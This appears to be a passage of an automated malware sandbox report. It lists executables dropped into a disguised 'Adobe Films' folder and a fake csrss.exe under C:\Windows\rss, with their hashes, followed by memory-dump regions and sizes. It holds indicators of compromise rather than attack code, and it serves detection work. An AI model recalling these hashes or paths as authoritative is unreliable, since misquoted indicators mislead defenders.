e23047bc26757654bad83c4c5149023c405e324275719cee102600192ac2fbc3cae0e59f98af6ba9b8ad61643ba5524f1c579ece1834964066464641d6c8286a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\tciaZAlp4hTWqrPU5MOfraXj.exe
MD5
1ba7f6d953e9046b94d2b81c014f1a06

SHA1
1aefccf993b882bf6016c94e7abf1bb838a2b337

SHA256
8266892792c1eefcce7b7a2503a3fabf5c3cf8dd7b41085796529aeb85ec0cb3

SHA512
e23047bc26757654bad83c4c5149023c405e324275719cee102600192ac2fbc3cae0e59f98af6ba9b8ad61643ba5524f1c579ece1834964066464641d6c8286a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\uDBlCWK9ITUKMGqvDEPwkgmM.exe
MD5
86f6bb10651a4bb77302e779eb1359de

SHA1
e924e660f34202beb56c2045e44dfd19aec4f0e3

SHA256
d2c52bc9e809b220bb23b809943a7343d06f0c124a0e09b2fc2544d4e5480d5c

SHA512
7efb62ee1ce8d09f3ca5dc4807ed9614102b159c630c91fb0f49dd482b7097bea9e461c52ebdd0b31c0675a46a3f47a454f68dab19ee94a2ca102cdc1ab94eab

Download Submit
C:\Users\Admin\Pictures\Adobe Films\uDBlCWK9ITUKMGqvDEPwkgmM.exe
MD5
f1f533ff9a3a56d90d21372bfb64958d

SHA1
d95f69e3d5f0927cc4a48633b5d6cd5d7285a027

SHA256
875a8306b34d6dcf208a88dd1f02224106326a993f3f7fb27df19b9cddc2ce12

SHA512
17c63fa9ea635f09b7ec019bbcf308a9729ace5a32528ad286286cdf0b6fefe11030b49d5beb470609f7a6fa3ab9916f62a07bccdcbdaada8b414eaaa44bc9f0

Download Submit
C:\Users\Admin\Pictures\Adobe Films\wwmFmtgN17iMh5A7PXI2jDxx.exe
MD5
ab5e336df7219dc233029967e7c13ff4

SHA1
5e3e4f57e0bf96d3443cfa8637672b39a0676b36

SHA256
3791c99cca719add78fbfffd3f54f3440596f7a99c8e2a76fee25d3cdbd1271d

SHA512
812c346ab88c597307b2fa2fa3db07fe7862f15bbdff8a44f9d390fd58f1120301801d0b02e0dc5f62d62958bc1f71947089201dfafef52cbc4dba4807ea374a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\wwmFmtgN17iMh5A7PXI2jDxx.exe
MD5
ab5e336df7219dc233029967e7c13ff4

SHA1
5e3e4f57e0bf96d3443cfa8637672b39a0676b36

SHA256
3791c99cca719add78fbfffd3f54f3440596f7a99c8e2a76fee25d3cdbd1271d

SHA512
812c346ab88c597307b2fa2fa3db07fe7862f15bbdff8a44f9d390fd58f1120301801d0b02e0dc5f62d62958bc1f71947089201dfafef52cbc4dba4807ea374a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\zurkvUBVvfKAfqSAhvzKp7Xe.exe
MD5
060f35c2005a1ed0227a436208410a8c

SHA1
b9597472d7ae40cfc0e08196eed993fc068b0683

SHA256
5605185c14b07099bbffd4a47bd8c944007e2db031c66f0137a008e14f3846ac

SHA512
0452ac9db2baf44ee9860d6010449373f4ff7c43ef4301944167125270af2d12602576b161d6556ba2ab82392ca1538725db76454ed934df4b57656d4f198796

Download Submit
C:\Windows\rss\csrss.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Windows\rss\csrss.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
memory/408-174-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/408-173-0x0000000002F20000-0x0000000003847000-memory.dmp

Filesize
9.2MB

Download
memory/408-172-0x0000000002ADA000-0x0000000002F17000-memory.dmp

Filesize
4.2MB

Download
memory/456-145-0x000000001CA90000-0x000000001CA92000-memory.dmp

Filesize
8KB

Download
memory/456-135-0x00000000009D0000-0x00000000009F2000-memory.dmp

Filesize
136KB

Download
memory/456-142-0x00007FFC412D0000-0x00007FFC41D91000-memory.dmp

Filesize
10.8MB

Download
memory/532-294-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/540-243-0x0000000000709000-0x0000000000717000-memory.dmp

Filesize
56KB

Download
memory/1348-169-0x0000000000400000-0x0000000002B51000-memory.dmp

Filesize
39.3MB

Download
memory/1348-150-0x0000000002E09000-0x0000000002E1A000-memory.dmp

Filesize
68KB

Download
memory/1348-167-0x0000000002E09000-0x0000000002E1A000-memory.dmp

Filesize
68KB

Download
memory/1348-168-0x0000000002CA0000-0x0000000002CA9000-memory.dmp

Filesize
36KB

Download
memory/1624-247-0x00000000051C0000-0x00000000051DE000-memory.dmp

Filesize
120KB

Download
memory/1624-236-0x0000000005140000-0x00000000051B6000-memory.dmp

Filesize
472KB

Download
memory/1624-229-0x0000000000920000-0x0000000000972000-memory.dmp

Filesize
328KB

Download
memory/1624-266-0x00000000715B0000-0x0000000071D60000-memory.dmp

Filesize
7.7MB

Download
memory/1716-259-0x000000000074D000-0x0000000000775000-memory.dmp

Filesize
160KB

Download
memory/1716-256-0x000000000074D000-0x0000000000775000-memory.dmp

Filesize
160KB

Download
memory/1744-190-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/1744-189-0x0000000002E00000-0x000000000323D000-memory.dmp

Filesize
4.2MB

Download
memory/1928-214-0x0000000000509000-0x0000000000575000-memory.dmp

Filesize
432KB

Download
memory/1952-262-0x00000000051F0000-0x00000000051F1000-memory.dmp

Filesize
4KB

Download
memory/1952-254-0x00000000715B0000-0x0000000071D60000-memory.dmp

Filesize
7.7MB

Download
memory/1952-255-0x0000000000770000-0x0000000000788000-memory.dmp

Filesize
96KB

Download
memory/1968-193-0x00000000037D0000-0x000000000398E000-memory.dmp

Filesize
1.7MB

Download
memory/2132-244-0x0000000002C60000-0x0000000002C61000-memory.dmp

Filesize
4KB

Download
memory/2132-267-0x00000000003C0000-0x0000000000534000-memory.dmp

Filesize
1.5MB

Download
memory/2132-277-0x0000000074220000-0x000000007426C000-memory.dmp

Filesize
304KB

Download
memory/2132-253-0x0000000074910000-0x0000000074999000-memory.dmp

Filesize
548KB

Download
memory/2132-260-0x0000000076050000-0x0000000076603000-memory.dmp

Filesize
5.7MB

Download
memory/2132-250-0x00000000003C0000-0x0000000000534000-memory.dmp

Filesize
1.5MB

Download
memory/2132-230-0x00000000003C0000-0x0000000000534000-memory.dmp

Filesize
1.5MB

Download
memory/2132-242-0x0000000075330000-0x0000000075545000-memory.dmp

Filesize
2.1MB

Download
memory/2132-257-0x00000000057B0000-0x00000000057B1000-memory.dmp

Filesize
4KB

Download
memory/2132-263-0x00000000011F0000-0x0000000001236000-memory.dmp

Filesize
280KB

Download
memory/2132-258-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/2132-234-0x0000000001090000-0x0000000001091000-memory.dmp

Filesize
4KB

Download
memory/2132-269-0x00000000003C0000-0x0000000000534000-memory.dmp

Filesize
1.5MB

Download
memory/2132-246-0x00000000003C0000-0x0000000000534000-memory.dmp

Filesize
1.5MB

Download
memory/2296-237-0x00000000008A0000-0x0000000000900000-memory.dmp

Filesize
384KB

Download
memory/2488-177-0x0000000002D40000-0x0000000002D55000-memory.dmp

Filesize
84KB

Download
memory/2528-175-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2564-178-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/2564-176-0x0000000002888000-0x0000000002CC5000-memory.dmp

Filesize
4.2MB

Download
memory/2980-291-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2980-303-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2980-293-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2980-297-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3024-241-0x0000000002410000-0x0000000002470000-memory.dmp

Filesize
384KB

Download
memory/3024-248-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/3024-251-0x0000000003640000-0x0000000003641000-memory.dmp

Filesize
4KB

Download
memory/3152-385-0x000000000058D000-0x00000000005B5000-memory.dmp

Filesize
160KB

Download
memory/3400-324-0x0000000010000000-0x0000000010D56000-memory.dmp

Filesize
13.3MB

Download
memory/3644-379-0x0000000000799000-0x00000000007A2000-memory.dmp

Filesize
36KB

Download
memory/3824-233-0x00007FFC401C0000-0x00007FFC40C81000-memory.dmp

Filesize
10.8MB

Download
memory/3824-238-0x0000000002780000-0x0000000002782000-memory.dmp

Filesize
8KB

Download
memory/3824-228-0x0000000000690000-0x00000000006B6000-memory.dmp

Filesize
152KB

Download
memory/4232-240-0x0000000000639000-0x0000000000689000-memory.dmp

Filesize
320KB

Download
memory/4316-225-0x0000000002150000-0x00000000021B0000-memory.dmp

Filesize
384KB

Download
memory/4404-235-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/4404-271-0x0000000074220000-0x000000007426C000-memory.dmp

Filesize
304KB

Download
memory/4404-245-0x00000000005F0000-0x000000000072A000-memory.dmp

Filesize
1.2MB

Download
memory/4404-239-0x0000000075330000-0x0000000075545000-memory.dmp

Filesize
2.1MB

Download
memory/4404-274-0x00000000715B0000-0x0000000071D60000-memory.dmp

Filesize
7.7MB

Download
memory/4404-252-0x0000000074910000-0x0000000074999000-memory.dmp

Filesize
548KB

Download
memory/4404-272-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/4404-249-0x00000000005F0000-0x000000000072A000-memory.dmp

Filesize
1.2MB

Download
memory/4404-270-0x00000000005F0000-0x000000000072A000-memory.dmp

Filesize
1.2MB

Download
memory/4404-232-0x00000000005F0000-0x000000000072A000-memory.dmp

Filesize
1.2MB

Download
memory/4404-264-0x00000000024C0000-0x0000000002506000-memory.dmp

Filesize
280KB

Download
memory/4404-265-0x0000000076050000-0x0000000076603000-memory.dmp

Filesize
5.7MB

Download
memory/4404-268-0x00000000005F0000-0x000000000072A000-memory.dmp

Filesize
1.2MB

Download
memory/4548-156-0x0000000007230000-0x00000000077D4000-memory.dmp

Filesize
5.6MB

Download
memory/4548-158-0x0000000007180000-0x0000000007192000-memory.dmp

Filesize
72KB

Download
memory/4548-183-0x0000000007220000-0x0000000007221000-memory.dmp

Filesize
4KB

Download
memory/4548-181-0x0000000000400000-0x0000000002B61000-memory.dmp

Filesize
39.4MB

Download
memory/4548-180-0x0000000002BE0000-0x0000000002C10000-memory.dmp

Filesize
192KB

Download
memory/4548-184-0x0000000007222000-0x0000000007223000-memory.dmp

Filesize
4KB

Download
memory/4548-179-0x0000000002D29000-0x0000000002D4C000-memory.dmp

Filesize
140KB

Download
memory/4548-185-0x0000000007223000-0x0000000007224000-memory.dmp

Filesize
4KB

Download
memory/4548-149-0x0000000002D29000-0x0000000002D4C000-memory.dmp

Filesize
140KB

Download
memory/4548-186-0x0000000007224000-0x0000000007226000-memory.dmp

Filesize
8KB

Download
memory/4548-157-0x0000000007E00000-0x0000000008418000-memory.dmp

Filesize
6.1MB

Download
memory/4548-160-0x00000000071A0000-0x00000000071DC000-memory.dmp

Filesize
240KB

Download
memory/4548-159-0x00000000077E0000-0x00000000078EA000-memory.dmp

Filesize
1.0MB

Download
memory/4548-182-0x00000000715B0000-0x0000000071D60000-memory.dmp

Filesize
7.7MB

Download
memory/4668-364-0x0000000000820000-0x0000000000968000-memory.dmp

Filesize
1.3MB

Download
memory/4668-366-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/4668-369-0x0000000075330000-0x0000000075545000-memory.dmp

Filesize
2.1MB

Download
memory/4668-376-0x0000000074910000-0x0000000074999000-memory.dmp

Filesize
548KB

Download
memory/4668-383-0x0000000076050000-0x0000000076603000-memory.dmp

Filesize
5.7MB

Download
memory/4668-386-0x0000000074220000-0x000000007426C000-memory.dmp

Filesize
304KB

Download
memory/4740-273-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4740-275-0x00000000715B0000-0x0000000071D60000-memory.dmp

Filesize
7.7MB

Download
memory/4792-261-0x00007FFC401C0000-0x00007FFC40C81000-memory.dmp

Filesize
10.8MB

Download
memory/4792-231-0x00000000006D0000-0x0000000000700000-memory.dmp

Filesize
192KB

Download
memory/4868-223-0x0000000000780000-0x00000000007E0000-memory.dmp

Filesize
384KB

Download
memory/5048-309-0x0000000000400000-0x0000000000629000-memory.dmp

Filesize
2.2MB

Download